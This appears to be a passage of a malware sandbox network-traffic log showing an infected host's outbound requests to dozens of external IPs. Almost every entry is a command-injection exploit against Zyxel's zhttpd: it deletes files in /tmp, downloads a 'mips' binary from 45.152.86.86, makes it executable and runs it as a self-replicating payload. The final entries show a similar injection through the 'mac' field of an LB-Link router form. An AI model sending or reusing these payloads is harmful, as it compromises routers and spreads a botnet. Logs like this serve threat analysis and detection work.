                              Mar 31, 2024 08:42:00.241801023 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7809192.168.2.133437614.80.133.192443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:00.241871119 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7810192.168.2.133905652.44.115.41443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:00.241909981 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7811192.168.2.1342372193.190.129.7443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:00.241946936 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7812192.168.2.1335912184.223.221.3443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:00.241986036 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7813192.168.2.1334218118.35.254.124443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:00.242036104 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7814192.168.2.1358936211.91.225.27443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:00.242063999 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7815192.168.2.135617443.81.121.92443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:00.242063999 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7816192.168.2.1360664126.66.211.125443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:00.242151976 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7817192.168.2.1348872153.94.10.122443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:00.242183924 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7818192.168.2.1356226146.73.255.69443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:00.242228985 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7819192.168.2.13352684.245.202.141443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:00.242279053 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7820192.168.2.1334768180.144.224.221443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:00.242320061 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7821192.168.2.1342986134.222.175.110443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:00.242372990 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7822192.168.2.1336242132.42.115.85443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:00.242410898 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7823192.168.2.135346631.133.250.253443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:00.242468119 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7824192.168.2.13348504.121.82.21443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:00.242495060 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7825192.168.2.135330847.10.155.150443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:00.242546082 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7826192.168.2.135547612.58.231.81443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:00.242598057 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7827192.168.2.135548074.6.66.157443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:00.242674112 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7828192.168.2.1348646208.227.150.7443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:00.242705107 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7829192.168.2.135376891.95.23.179443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:00.242744923 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7830192.168.2.1337328122.5.117.45443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:00.242793083 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7831192.168.2.1336850106.75.8.54443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:00.242824078 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7832192.168.2.1340230125.123.2.224443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:00.242870092 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7833192.168.2.136098827.189.35.140443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:00.242908955 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7834192.168.2.1347400155.135.188.198443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:00.242954969 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7835192.168.2.134274270.71.33.112443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:00.243002892 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7836192.168.2.1360324180.73.121.118443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:00.243027925 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7837192.168.2.134013244.60.103.7443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:00.243065119 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7838192.168.2.134143074.160.184.172443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:00.243110895 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7839192.168.2.133294297.46.14.13443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:00.243159056 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7840192.168.2.135052664.87.239.96443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:00.243195057 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7841192.168.2.134366096.31.195.242443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:00.243241072 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7842192.168.2.1354714137.252.244.123443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:00.243279934 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7843192.168.2.1347980148.24.228.102443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:00.243313074 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7844192.168.2.1355480221.210.47.90443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:00.243340015 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7845192.168.2.133817083.2.112.80443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:00.243395090 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7846192.168.2.1347894181.236.41.88443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:00.243419886 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7847192.168.2.13464201.110.159.120443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:00.243468046 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7848192.168.2.1351902200.215.140.32443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:00.243521929 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7849192.168.2.1342034200.225.172.86443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:00.243565083 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7850192.168.2.1336770115.170.135.5443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:00.243599892 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7851192.168.2.1344668164.121.69.139443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:00.243652105 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7852192.168.2.1345278101.63.185.149443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:00.243697882 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7853192.168.2.1352406221.70.119.136443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:00.243737936 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7854192.168.2.1333214101.79.97.209443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:00.243772984 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7855192.168.2.135138845.127.54.35443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:00.243803024 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7856192.168.2.1340188142.46.154.8443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:00.243855000 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7857192.168.2.1354884181.109.212.205443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:00.243896961 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7858192.168.2.1357418125.89.200.159443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:00.243921995 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7859192.168.2.1335220183.255.88.113443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:00.243963003 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7860192.168.2.1336186135.202.163.61443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:00.244018078 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7861192.168.2.1342430174.12.21.98443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:00.244046926 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7862192.168.2.134349064.23.209.20443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:00.244096041 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7863192.168.2.1347908153.202.132.238443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:00.244132996 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7864192.168.2.1355386130.98.137.47443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:00.244167089 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7865192.168.2.1341086109.74.87.147443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:00.244226933 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7866192.168.2.135052880.58.131.198443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:00.244261026 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7867192.168.2.13369049.110.211.255443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:00.244294882 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7868192.168.2.1345366147.206.93.65443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:00.244322062 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7869192.168.2.1343548216.252.2.113443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:00.244354963 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7870192.168.2.1344966166.29.114.81443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:00.244391918 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7871192.168.2.1336042145.102.23.18443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:00.244457006 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7872192.168.2.13361224.32.17.53443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:00.244492054 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7873192.168.2.1350916204.177.60.45443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:00.244519949 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7874192.168.2.134869454.240.219.34443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:00.244577885 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7875192.168.2.135456037.16.13.598080
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:00.373265982 CEST191OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                              Cookie: user=admin
                              Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 32 2e 38 36 2e 38 36 2f 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 70 73 6c 3b 20 2e 2f 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 0d 0a 0d 0a
                              Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;wget http://45.152.86.86/mpsl; chmod 777 mpsl; ./mpsl lblink.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7876192.168.2.134401227.3.206.2018080
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:00.665182114 CEST191OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
